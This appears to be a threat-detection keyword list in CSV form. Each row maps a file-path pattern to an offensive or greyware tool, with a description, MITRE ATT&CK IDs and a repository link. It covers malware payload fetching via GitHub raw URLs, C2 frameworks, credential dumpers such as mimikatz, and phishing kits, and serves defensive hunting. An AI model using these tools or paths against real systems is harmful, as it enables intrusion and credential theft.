-*/github.com/*/raw/main/*.pl*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.plx*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.pm*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.ppk*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.ps1*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.psm1*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.pub*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.py*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.pyc*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.pyo*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.rar*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.raw*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.reg*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.rgs*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.RGS*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.run*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.scpt*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.script*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.sct*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.sh*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.ssh*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.sys*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.teamserver*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.temp*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.tgz*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.tmp*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.vb*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.vbs*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.vbscript*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.ws*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.wsf*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.wsh*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.X86*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.X86_64*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.xlam*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.xlm*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.xlsm*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.zip*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/GithubC2.git*,offensive_tool_keyword,GithubC2,Github as C2,T1095 - T1071.001,TA0011,N/A,N/A,C2,https://github.com/TheD1rkMtr/GithubC2,1,1,N/A,10,10,115,29,2023-08-02T02:26:05Z,2023-02-15T00:50:59Z -*/gkrellm-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/glit.git*,offensive_tool_keyword,glit,Retrieve all mails of users related to a git repository a git user or a git organization,T1583 - T1059.001 - T1059.003,TA0002 - TA0003,N/A,N/A,Reconnaissance,https://github.com/shadawck/glit,1,1,N/A,8,1,34,6,2022-11-28T20:42:23Z,2022-11-14T11:25:10Z -*/glit-cli*,offensive_tool_keyword,glit,Retrieve all mails of users related to a git repository a git user or a git organization,T1583 - T1059.001 - T1059.003,TA0002 - TA0003,N/A,N/A,Reconnaissance,https://github.com/shadawck/glit,1,0,N/A,8,1,34,6,2022-11-28T20:42:23Z,2022-11-14T11:25:10Z -*/glit-core*,offensive_tool_keyword,glit,Retrieve all mails of users related to a git repository a git user or a git organization,T1583 - T1059.001 - T1059.003,TA0002 - TA0003,N/A,N/A,Reconnaissance,https://github.com/shadawck/glit,1,0,N/A,8,1,34,6,2022-11-28T20:42:23Z,2022-11-14T11:25:10Z -*/globeimposter.profile*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/BC-SECURITY/Malleable-C2-Profiles,1,1,N/A,10,10,224,42,2023-06-11T17:38:36Z,2020-08-28T22:37:09Z -*/gmailC2.exe*,offensive_tool_keyword,SharpGmailC2,Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol,T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001,TA0011 - TA0040 - TA0001,N/A,N/A,C2,https://github.com/reveng007/SharpGmailC2,1,1,N/A,10,10,242,40,2022-12-27T01:45:46Z,2022-11-10T06:48:15Z -*/gMSA_dump_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*/gMSADumper*,offensive_tool_keyword,gMSADumper,Lists who can read any gMSA password blobs and parses them if the current user has access.,T1552.001 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/micahvandeusen/gMSADumper,1,1,N/A,N/A,2,190,34,2023-08-23T13:32:49Z,2021-04-10T00:15:24Z -*/GMSAPasswordReader.git*,offensive_tool_keyword,GMSAPasswordReader,Reads the password blob from a GMSA account using LDAP and parses the values into hashes for re-use.,T1003.004 - T1078.003 - T1059.006,TA0006 - TA0004 - TA0002,N/A,N/A,Credential Access,https://github.com/rvazarkar/GMSAPasswordReader,1,1,N/A,7,2,103,23,2023-02-17T14:37:40Z,2020-01-19T19:06:20Z -*/gobuster.git*,offensive_tool_keyword,gobuster,Directory/File DNS and VHost busting tool written in Go,T1595 - T1133 - T1110 - T1027 - T1132 - T1048,TA0010 - TA0001 - TA0006 - TA0005 - TA0011,N/A,N/A,Network Exploitation Tools,https://github.com/OJ/gobuster,1,1,N/A,N/A,10,8199,1120,2023-09-12T22:37:40Z,2014-11-14T13:18:35Z -*/gobuster/*,offensive_tool_keyword,gobuster,Directory/File DNS and VHost busting tool written in Go,T1595 - T1133 - T1110 - T1027 - T1132 - T1048,TA0010 - TA0001 - TA0006 - TA0005 - TA0011,N/A,N/A,Network Exploitation Tools,https://github.com/OJ/gobuster,1,1,N/A,N/A,10,8199,1120,2023-09-12T22:37:40Z,2014-11-14T13:18:35Z -*/gobusterdir/*,offensive_tool_keyword,gobuster,Directory/File DNS and VHost busting tool written in Go,T1595 - T1133 - T1110 - T1027 - T1132 - T1048,TA0010 - TA0001 - TA0006 - TA0005 - TA0011,N/A,N/A,Network Exploitation Tools,https://github.com/OJ/gobuster,1,1,N/A,N/A,10,8199,1120,2023-09-12T22:37:40Z,2014-11-14T13:18:35Z -*/gobusterdns/*,offensive_tool_keyword,gobuster,Directory/File DNS and VHost busting tool written in Go,T1595 - T1133 - T1110 - T1027 - T1132 - T1048,TA0010 - TA0001 - TA0006 - TA0005 - TA0011,N/A,N/A,Network Exploitation Tools,https://github.com/OJ/gobuster,1,1,N/A,N/A,10,8199,1120,2023-09-12T22:37:40Z,2014-11-14T13:18:35Z -*/gobustergcs/*,offensive_tool_keyword,gobuster,Directory/File DNS and VHost busting tool written in Go,T1595 - T1133 - T1110 - T1027 - T1132 - T1048,TA0010 - TA0001 - TA0006 - TA0005 - TA0011,N/A,N/A,Network Exploitation Tools,https://github.com/OJ/gobuster,1,1,N/A,N/A,10,8199,1120,2023-09-12T22:37:40Z,2014-11-14T13:18:35Z -*/gocrack.git*,offensive_tool_keyword,gocrack,GoCrack is a management frontend for password cracking tools written in Go,T1110 - T1021.001,TA0006 - TA0001,N/A,N/A,Credential Access,https://github.com/mandiant/gocrack,1,1,N/A,9,10,1074,271,2023-10-03T21:43:08Z,2017-10-23T14:43:59Z -*/gocrack/.hashcat*,offensive_tool_keyword,gocrack,GoCrack is a management frontend for password cracking tools written in Go,T1110 - T1021.001,TA0006 - TA0001,N/A,N/A,Credential Access,https://github.com/mandiant/gocrack,1,0,N/A,9,10,1074,271,2023-10-03T21:43:08Z,2017-10-23T14:43:59Z -*/gocrack/server*,offensive_tool_keyword,gocrack,GoCrack is a management frontend for password cracking tools written in Go,T1110 - T1021.001,TA0006 - TA0001,N/A,N/A,Credential Access,https://github.com/mandiant/gocrack,1,0,N/A,9,10,1074,271,2023-10-03T21:43:08Z,2017-10-23T14:43:59Z -*/gocrack_server*,offensive_tool_keyword,gocrack,GoCrack is a management frontend for password cracking tools written in Go,T1110 - T1021.001,TA0006 - TA0001,N/A,N/A,Credential Access,https://github.com/mandiant/gocrack,1,0,N/A,9,10,1074,271,2023-10-03T21:43:08Z,2017-10-23T14:43:59Z -*/gocrack_worker*,offensive_tool_keyword,gocrack,GoCrack is a management frontend for password cracking tools written in Go,T1110 - T1021.001,TA0006 - TA0001,N/A,N/A,Credential Access,https://github.com/mandiant/gocrack,1,0,N/A,9,10,1074,271,2023-10-03T21:43:08Z,2017-10-23T14:43:59Z -*/gocrack-1.0.zip*,offensive_tool_keyword,gocrack,GoCrack is a management frontend for password cracking tools written in Go,T1110 - T1021.001,TA0006 - TA0001,N/A,N/A,Credential Access,https://github.com/mandiant/gocrack,1,0,N/A,9,10,1074,271,2023-10-03T21:43:08Z,2017-10-23T14:43:59Z -*/goDoH.git*,offensive_tool_keyword,godoh,godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.,T1071 - T1001 - T1008 - T1070 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/sensepost/godoh,1,1,N/A,10,10,701,122,2023-02-25T06:31:07Z,2018-10-23T07:24:04Z -*/godoh/*,offensive_tool_keyword,godoh,godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.,T1071 - T1001 - T1008 - T1070 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/sensepost/godoh,1,1,N/A,10,10,701,122,2023-02-25T06:31:07Z,2018-10-23T07:24:04Z -*/GoFetch.git*,offensive_tool_keyword,GoFetch,GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.,T1078 - T1078.003 - T1021 - T1021.006 - T1076.001,TA0005 - TA0001 - TA0003,N/A,N/A,Exploitation tools - AD Enumeration,https://github.com/GoFetchAD/GoFetch,1,1,N/A,10,7,615,126,2017-06-20T14:15:10Z,2017-04-11T10:45:23Z -*/golang_c2.git*,offensive_tool_keyword,golang_c2,C2 written in Go for red teams aka gorfice2k,T1071 - T1021 - T1043 - T1090,TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/m00zh33/golang_c2,1,1,N/A,10,10,4,8,2019-03-18T00:46:41Z,2019-03-19T02:39:59Z -*/GoldenGMSA.git*,offensive_tool_keyword,GoldenGMSA,GolenGMSA tool for working with GMSA passwords,T1003.004 - T1078.003 - T1059.006,TA0006 - TA0004 - TA0002,N/A,N/A,Credential Access,https://github.com/Semperis/GoldenGMSA,1,1,N/A,7,2,113,17,2023-07-03T09:35:48Z,2022-02-03T10:32:05Z -*/goMatrixC2.git*,offensive_tool_keyword,goMatrixC2,C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.,T1090 - T1027 - T1071,TA0011 - TA0009 - TA0010,N/A,N/A,C2,https://github.com/n1k7l4i/goMatrixC2,1,1,N/A,10,10,0,2,2023-09-11T10:20:41Z,2023-08-31T09:36:38Z -*/go-mimikatz*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/vyrus001/go-mimikatz,1,1,N/A,10,6,593,105,2022-09-08T18:14:20Z,2015-10-22T08:43:38Z -*/GONET-Scanner/*,offensive_tool_keyword,GONET-Scanner,port scanner and arp discover in go,T1595,TA0001,N/A,N/A,Network Exploitation tools,https://github.com/luijait/GONET-Scanner,1,1,N/A,N/A,1,72,18,2022-03-10T04:35:58Z,2022-02-02T19:39:09Z -*/GoodSync-vsub-Setup.exe*,greyware_tool_keyword,Goodsync,GoodSync is a backup and file synchronization program abused by attacker for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://www.goodsync.com/,1,1,N/A,9,10,N/A,N/A,N/A,N/A -*/goPassGen.git*,offensive_tool_keyword,goPassGen,Easily-guessable Password Generator for Password Spray Attack,T1110 - T1110.003,TA0006 ,N/A,N/A,Exploitation tools,https://github.com/bigb0sss/goPassGen,1,1,N/A,8,1,20,3,2020-06-04T23:13:44Z,2020-06-04T22:33:37Z -*/gopher-ls.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/gophish.db*,offensive_tool_keyword,gophish,Open-Source Phishing Toolkit,T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/gophish/gophish,1,1,N/A,10,10,9757,1875,2023-09-28T02:03:58Z,2013-11-18T23:26:43Z -*/gophish/*,offensive_tool_keyword,gophish,Open-Source Phishing Toolkit,T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/gophish/gophish,1,1,N/A,10,10,9757,1875,2023-09-28T02:03:58Z,2013-11-18T23:26:43Z -*/gorsair.go*,offensive_tool_keyword,Gorsair,Gorsair hacks its way into remote docker containers that expose their APIs,T1552,TA0006,N/A,N/A,Exploitation tools,https://github.com/Ullaakut/Gorsair,1,1,N/A,N/A,9,825,74,2023-09-09T13:18:33Z,2018-08-02T16:49:14Z -*/go-secdump.git*,offensive_tool_keyword,go-secdump,Tool to remotely dump secrets from the Windows registry,T1003.002 - T1012 - T1059.003,TA0006 - TA0003 - TA0002,N/A,N/A,Credential Access,https://github.com/jfjallid/go-secdump,1,1,N/A,10,1,81,7,2023-05-02T15:01:10Z,2023-02-23T17:02:50Z -*/gosecretsdump*,offensive_tool_keyword,deimosc2,DeimosC2 is a Golang command and control framework for post-exploitation.,T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007,TA0011,N/A,N/A,C2,https://github.com/DeimosC2/DeimosC2,1,1,N/A,10,10,1004,158,2023-07-15T05:34:10Z,2020-06-30T19:24:13Z -*/Gotato.git*,offensive_tool_keyword,Gotato,Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.,T1003.003 - T1056.002 - T1550.001 - T1090,TA0005 - TA0004 - TA0009,N/A,N/A,Privilege Escalation,https://github.com/iammaguire/Gotato,1,1,N/A,9,2,114,16,2021-06-07T21:19:58Z,2021-06-05T22:32:48Z -*/gotato.go*,offensive_tool_keyword,Gotato,Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.,T1003.003 - T1056.002 - T1550.001 - T1090,TA0005 - TA0004 - TA0009,N/A,N/A,Privilege Escalation,https://github.com/iammaguire/Gotato,1,1,N/A,9,2,114,16,2021-06-07T21:19:58Z,2021-06-05T22:32:48Z -*/goZulipC2.git*,offensive_tool_keyword,goZulipC2,C2 leveraging Zulip Messaging Platform as Backend.,T1090 - T1090.003 - T1071 - T1071.001,TA0011 - TA0009,N/A,N/A,C2,https://github.com/n1k7l4i/goZulipC2,1,1,N/A,10,10,5,2,2023-08-31T12:06:58Z,2023-08-13T11:04:20Z -*/GPOddity.git*,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,1,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -*/GPOddity/*,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,1,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -*/gpp-decrypt*,offensive_tool_keyword,gpp-decrypt,Decrypt the given Group Policy Preferences,T1552.002 - T1212,TA0009 - TA0006,N/A,N/A,Credential Access,https://gitlab.com/kalilinux/packages/gpp-decrypt,1,1,N/A,6,10,N/A,N/A,N/A,N/A -*/gpsd-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/GreatSCT/*,offensive_tool_keyword,GreatSCT,The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.,T1055 - T1112 - T1189 - T1205,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/GreatSCT/GreatSCT,1,1,N/A,N/A,10,1103,214,2021-02-10T22:05:27Z,2017-05-12T03:30:41Z -*/GreatSCT/GreatSCT*,offensive_tool_keyword,GreatSCT,GreatSCT is a tool designed to generate metasploit payloads that bypass common anti-virus solutions and application whitelisting solutions. GreatSCT is current under support by @ConsciousHacker,T1027 - T1055 - T1566 - T1218,TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/GreatSCT/GreatSCT,1,0,N/A,N/A,10,1103,214,2021-02-10T22:05:27Z,2017-05-12T03:30:41Z -*/greatsct-output*,offensive_tool_keyword,GreatSCT,The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.,T1055 - T1112 - T1189 - T1205,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/GreatSCT/GreatSCT,1,1,N/A,N/A,10,1103,214,2021-02-10T22:05:27Z,2017-05-12T03:30:41Z -*/Group3r.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*/Grouper2.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*/GruntHTTP.exe*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*/gtfobins.go*,offensive_tool_keyword,traitor,Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy,T1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/liamg/traitor,1,1,N/A,N/A,10,6213,494,2023-03-16T16:21:13Z,2021-01-24T10:50:15Z -*/gtfobins.py*,offensive_tool_keyword,BeRoot,Privilege Escalation Project - Windows / Linux / Mac ,T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007,TA0007 - TA0003 - TA0002 